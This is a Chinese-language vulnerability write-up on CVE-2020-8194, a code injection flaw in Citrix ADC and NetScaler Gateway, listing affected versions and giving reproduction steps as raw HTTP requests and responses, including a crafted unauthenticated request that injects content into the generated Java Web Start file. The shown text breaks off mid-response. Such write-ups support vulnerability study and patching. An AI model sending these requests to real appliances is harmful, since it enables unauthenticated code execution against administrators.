menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2020-8194)Citrix 未授权访问导致的任意代码执行漏洞 chevron_right (CVE-2020-8194)Citrix 未授权访问导致的任意代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2020-8194)Citrix 未授权访问导致的任意代码执行漏洞.md
    4.87 KB / 2021-07-15 19:49:28
        (CVE-2020-8194)Citrix 未授权访问导致的任意代码执行漏洞
========================================================

一、漏洞简介
------------

Citrix ADC和Citrix NetScaler
Gateway存在一个代码注入漏洞。未经身份验证的远程攻击者可以利用它来创建恶意文件,如果该恶意文件由管理网络上的受害者执行,则可以允许攻击者在该用户的上下文中执行任意代码。

二、漏洞影响
------------

Citrix ADC and Citrix Gateway: \< 13.0-58.30

Citrix ADC and NetScaler Gateway: \< 12.1-57.18

Citrix ADC and NetScaler Gateway: \< 12.0-63.21

Citrix ADC and NetScaler Gateway: \< 11.1-64.14 

NetScaler ADC and NetScaler Gateway: \< 10.5-70.18

Citrix SD-WAN WANOP: \< 11.1.1a

Citrix SD-WAN WANOP: \< 11.0.3d

Citrix SD-WAN WANOP: \< 10.2.7

Citrix Gateway Plug-in for Linux: \<  1.0.0.137

三、复现过程
------------

> 通过URL来生成Java Web Start文件,此URL不需要身份验证:

    GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1
    Host: www.0-sec.org
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: startupapp=st
    Upgrade-Insecure-Requests: 1

此时Citrix会为用户返回一个生成的文件,且该文件会被允许连接到Citrix设备之中

    HTTP/1.1 200 OK
    Date: Tue, 21 Jan 2020 20:32:44 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Cache-Control: max-age=10
    X-XSS-Protection: 1; mode=block
    Content-Length: 2320
    Connection: close
    Content-Type: application/x-java-jnlp-file

    <jnlp codebase="2://citrix.local" href="/menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4">

    <information>
    <title>GUI citrix.local</title>
    <vendor>Citrix Systems, Inc.</vendor>
    <homepage href="help/im/help.htm"/>
    <description>Configuration Utility - Web Start Client</description>
    <icon href="admin_ui/common/images/guiicon.gif"/>
    <shortcut online="true">
    <desktop/>
    </shortcut>
    </information>

    <security>
    <all-permissions/>
    </security>

    <resources>
    <j2se version="1.6+" initial-heap-size="256M" max-heap-size="256M" />
    <jar href="/admin_ui/php/application/views/applets/gui.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_images.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_view1.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_view2.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_view3.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_view4.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_view5.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_view6.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gui_view7.jar"/>
    <jar href="/admin_ui/php/application/views/applets/guicommon.jar"/>
    <jar href="/admin_ui/php/application/views/applets/ns.jar"/>
    <jar href="/admin_ui/php/application/views/applets/jnlp.jar"/>
    <jar href="/admin_ui/php/application/views/applets/sinetfactory.jar"/>
    <jar href="/admin_ui/php/application/views/applets/sslava.jar"/>
    <jar href="/admin_ui/php/application/views/applets/pixl.jar"/>
    <jar href="/admin_ui/php/application/views/applets/looks.jar"/>
    <jar href="/admin_ui/php/application/views/applets/l2fprod-common-tasks.jar"/>
    <jar href="/admin_ui/php/application/views/applets/commons-codec.jar"/>
    <jar href="/admin_ui/php/application/views/applets/java40.jar"/>
    <jar href="/admin_ui/php/application/views/applets/prefuse.jar"/>
    <jar href="/admin_ui/php/application/views/applets/gson.jar"/>
    </resources>

    <application-desc main-class="ns.im.Gui">
    <argument>-D</argument>
    <argument>0</argument>
    <argument>-WS</argument>
    <argument>0</argument>
    <argument>-codebase</argument>
    <argument>2://citrix.local</argument>
    <argument>-ns4</argument>
    <argument>1</argument>
    <argument>-ns10</argument><argument>4</argument></application-desc>
    </jnlp>

如上所示,用户输入的代码,会直接反馈在输出中,那我们就可以尝试一下执行恶意代码

    GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo HTTP/1.1
    Host: www.0-sec.org

返回值

    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2020 12:52:01 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Cache-Control: max-age=10
    X-XSS-Protection: 1; mode=block
    Content-Length: 2398
    Connection: close
    Content-Type: application/x-java-jnlp-file

    <jnlp codebase="wiki.0-sec.org">://www.0-sec.org" href="/menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org">&id=HENKC&nsvpx=phpinfo">

    <information>
    <title>GUI citrix.local</title>
    <vendor>Citrix Systems, Inc.</vendor>
    links
    file_download